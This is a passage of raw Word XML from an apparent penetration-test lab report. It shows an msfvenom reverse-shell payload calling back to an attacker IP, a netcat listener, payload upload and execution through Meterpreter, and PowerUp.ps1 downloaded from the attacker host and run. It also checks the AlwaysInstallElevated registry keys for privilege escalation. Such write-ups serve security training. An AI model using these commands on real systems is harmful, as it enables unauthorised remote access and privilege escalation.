                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2BD7B914"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msfvenom</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -p windows/x64/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell_reverse_tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> LHOST=192.168.45.154 LPORT=139 -f exe &gt; shell.exe</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0DE40484"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lastRenderedPageBreak/>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DAA61DD" wp14:editId="6C7932F3">
                        <wp:extent cx="5613400" cy="854710"/>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
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5613400" cy="854710"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7F8E0408" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>On Kali attacking machine:</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="063D9D12"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sudo</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>nc</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>lvp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 139</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="04BF8041" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>On Meterpreter session:</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="41A7E061"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proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>meterpreter</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> &gt; upload shell.exe</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6057CDDE"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proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>meterpreter</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> &gt; execute -f </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell.exe</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w14:paraId="3D4A0BD5" w14:textId="5BF25381" w:rsidR="00CB67CB" w:rsidRPr="00E20BC9"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00A4820D" wp14:editId="421DE43F">
                        <wp:extent cx="5613400" cy="959485"/>
                        <wp:effectExtent l="0" t="0" r="0"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a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5613400" cy="959485"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5CB4C830"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0FCA0F38" wp14:editId="55B69D7A">
                        <wp:extent cx="5613400" cy="1337945"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:docPr id="1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5613400" cy="1337945"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1E70C32A" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>Local.txt value:</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="66FBE10C"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whoami</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> &amp;&amp; ipconfig &amp;&amp; type local.txt</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="040A96E5" w14:textId="486449F9"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lastRenderedPageBreak/>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59C42BC2" wp14:editId="55CF9488">
                        <wp:extent cx="5613400" cy="2304415"/>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5613400" cy="2304415"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="254B79E7" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">4.1.3 </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Privilege Escalation - </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:b/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>AlwaysInstallElevated</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="5B905AEC" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">We used PowerUp.ps1 to check the low-hanging fruit and found that system is vulnerable to </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:color w:val="C9211E"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>AlwaysInstallElevated</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">. As Microsoft mentioned, </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>This</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> option is equivalent to granting full administrative rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4BFCFEED" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="2"/>
                    </w:numPr>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:hyperlink r:id="rId28">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                        <w:color w:val="FF0000"/>
                        <w:sz w:val="22"/>
                        <w:szCs w:val="22"/>
                      </w:rPr>
                      <w:t>https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p w14:paraId="43CCB937" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="2"/>
                    </w:numPr>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:hyperlink r:id="rId29">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                        <w:color w:val="FF0000"/>
                        <w:sz w:val="22"/>
                        <w:szCs w:val="22"/>
                      </w:rPr>
                      <w:t>https://learn.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p w14:paraId="1FEA5B22" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="7CB6ED42"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python -m </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>http.server</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 80</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="10B8E8E0"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17820431" wp14:editId="71E79D05">
                        <wp:extent cx="5613400" cy="440055"/>
                        <wp:effectExtent l="0" t="0" r="0" b="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0"/>
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5613400" cy="440055"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="20CAA26F"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iwr</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> http://192.168.45.154/PowerUp.ps1 -o PowerUp.ps1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="18C633A0"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5D7FC51F" wp14:editId="09BA1D4B">
                        <wp:extent cx="5613400" cy="1385570"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:docPr id="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a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5613400" cy="1385570"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="06B7368D" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t xml:space="preserve">We’ll load the PowerUp.ps1 script into </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>powershell</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> and check for any low-hanging fruit.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3DB48641"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PS C:\Users\shenzi\Desktop</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>&gt; .</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> .\PowerUp.ps1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="518F4CF2"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PS C:\Users\shenzi\Desktop&gt; Invoke-</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>AllChecks</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="0187B7E2"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4402705B" wp14:editId="2C9D300C">
                        <wp:extent cx="5613400" cy="959485"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:docPr id="3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2"/>
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5613400" cy="959485"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4EA61605"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2548FFCC" wp14:editId="7C89FADD">
                        <wp:extent cx="5613400" cy="103759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5613400" cy="1037590"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="54A78B25" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>We can also confirm this vulnerability using manual command as suggested by Microsoft.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3A91DAC4" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">URL: </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId34">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                        <w:color w:val="0563C1"/>
                        <w:sz w:val="22"/>
                        <w:szCs w:val="22"/>
                        <w:u w:val="single"/>
                      </w:rPr>
                      <w:t>https://learn.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p w14:paraId="08826042"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 xml:space="preserve">PS C:\Users\shenzi\Desktop&gt; </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="C9211E"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0CB3694B"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reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="59DB2741"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HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="477DCD9E"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color w:val="C9211E"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>AlwaysInstallElevated</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    REG_DWORD    0x1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4045FA8B" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">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p>
                <w:p w14:paraId="57A97FA9"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PS C:\Users\shenzi\Desktop&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="C9211E"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1C935615"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reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5B5A1561"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sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="29F31B75"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jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="C9211E"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="16"/>
                      <w:szCs w:val="16"/>
                    </w:rPr>
                    <w:t>AlwaysInstallElevated</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
